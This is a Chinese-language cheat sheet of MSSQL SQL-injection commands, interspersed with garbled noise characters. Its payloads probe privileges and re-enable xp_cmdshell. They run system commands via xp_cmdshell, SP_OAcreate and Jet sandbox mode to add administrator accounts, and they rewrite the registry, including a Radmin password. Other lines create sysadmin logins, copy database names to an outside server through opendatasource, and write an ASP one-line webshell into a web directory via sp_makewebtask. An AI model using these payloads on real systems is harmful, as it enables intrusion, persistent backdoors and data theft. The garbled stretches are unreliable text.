常用的一些注入命令

admin

//看看是什么权限的
) a& ?5 s3 \. `$ |and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
* s$ D( q) A5 C" F! M9 W
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
( P, _2 i, ]1 S8 y
( g# ~- P0 I9 p: m, S
1 W+ Y: I0 K5 Z% q5 [6 j7 d. n数字类型
, }: }6 F4 Z% Dand char(124)%2Buser%2Bchar(124)=0

. a% s% |; a( b字符类型
8 {. k# S7 y( [; Y' and char(124)%2Buser%2Bchar(124)=0 and ''='
0 i: u: G9 u. \5 L2 T* M8 {
$ y2 y) J) S7 F- C! \) @$ n+ r搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

0 l( X3 a# t* P8 ^# v5 X爆用户名
and user>0
6 `+ @' f* g5 {9 f* E( X' and user>0 and ''='

  E3 R: b6 R: y( H" x  J. a) y' o检测是否为SA权限
6 L, I/ k/ L5 Yand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
# \8 a0 B8 h2 i3 k& H- kAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

8 T$ ^) g3 k. b+ |* w9 g检测是不是MSSQL数据库
and exists (select * from sysobjects);--

$ Z: C8 a. E' [1 Y( N4 W$ y检测是否支持多行
;declare @d int;--

( U$ a0 `# [4 ]恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
3 H% Z  M  l: d% J+ r% t

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

1 k) a8 J( U* G, z# M//-----------------------
//       执行命令
5 b' R! N) Q6 ~//-----------------------
- z5 z/ H# x9 J4 ~首先开启沙盘模式：
) Q3 R: k0 `1 y/ |, D3 xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

9 e5 A' A, I# \8 r8 L# t( r2 o0 v0 m然后利用jet.oledb执行系统命令
, Y9 X! D- b2 ?' ?) b8 N1 mselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
5 T0 n0 }1 W, }7 e- f;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
6 L+ v9 @& ?4 i
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
& U6 w5 z* ]" f# X9 d" x: i9 o4 @
3 ?8 a$ L3 r, x+ b# z  B写注册表
* B8 c% L- s2 W+ j% Z: Z+ k4 jexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

9 Z  f1 C( E) ?% nREG_SZ
1 ~+ U, b/ U% Y
读注册表
* ~( k4 X" N" S1 ~& Y/ x( q, G6 \exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

; q4 m) s$ ~9 S$ X0 \读取目录内容
+ s5 i0 p  b8 c' w! M2 a4 pexec master..xp_dirtree 'c:\winnt\system32\',1,1

9 q4 e) |. J! O
数据库备份
0 O, Z0 D- N0 V) _% y3 j" b  S8 nbackup database pubs to disk = 'c:\123.bak'
! e2 `$ a" D9 ?
//爆出长度
9 }; \* c' x; i. PAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
* M0 Z8 g1 J9 F8 ]1 D( P7 I& r( h


2 u% }) D+ ]" R7 `1 c1 O6 l0 z更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'
$ ?. p" t5 n- @4 D2 d( z- Z
* m1 F5 j4 X9 e3 x5 ~添加和删除一个SA权限的用户test：
' d% M+ g1 o8 ]8 l& qexec master.dbo.sp_addlogin test,9530772
1 M, v: D5 C. ]exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
' p' {, a' z3 b; pEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
$ a% ]1 X  E  q& |9 {- ?' NGRANT exec On xp_proxiedadata TO public


; Z) P8 }) R) }停掉或激活某个服务。

6 u* i% c' m% h$ y3 L3 p& g. dexec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
  a2 N' }$ B( \1 n9 U
. |; i3 F0 {% p1 D6 E- T) q8 jdbo.xp_subdirs
2 ~& @: z* R+ X, W; E7 Y
2 _- _& J5 ?/ U+ M只列某个目录下的子目录。
) ?+ Y2 u; R! `xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab
& [/ \2 p& t8 @8 x1 V, P/ i
将目标多个档案压缩到某个目标档案之内。
; ^0 }. e. |1 d所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
9 u- E4 R9 X0 D  t. }% X'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
1 V5 S" \6 T* r6 `
xp_terminate_process
. P) ]* I( `% ~* i
: v, {8 r* s( j停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
. L1 ~- V4 s+ P
xp_terminate_process 2484
( h: i$ V. ^5 k5 e
# f. V, U2 M. ?  ~$ cxp_unpackcab

解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1


某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
8 D: Q& q. ~% v* S/ ^  ICreate TABLE ku(name nvarchar(256) null);
8 B, l: p. N% }Create TABLE biao(id int NULL,name nvarchar(256) null);
, ]8 S& h! W- p3 m1 W, p
$ d- T- d: O' y, ^9 d' t//得到数据库名
- Q8 d. Q* K4 ~: O, Z9 s" Kinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
! ~* Y* I5 A* f4 _) i. I
, g, }# z; u$ ^5 q  I1 \- O
//在Master中创建表，看看权限怎样
  ~0 I# J: C  }5 P3 `Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
/ s2 y; i7 x6 X# }5 E
用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
3 M, X/ t, ?# ?( C* q" K
; [9 {0 K$ q7 ?  o6 j//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

" d( i# H7 r( K( _- a; d2 O//删除内容
delete from table_name where Stockid = 3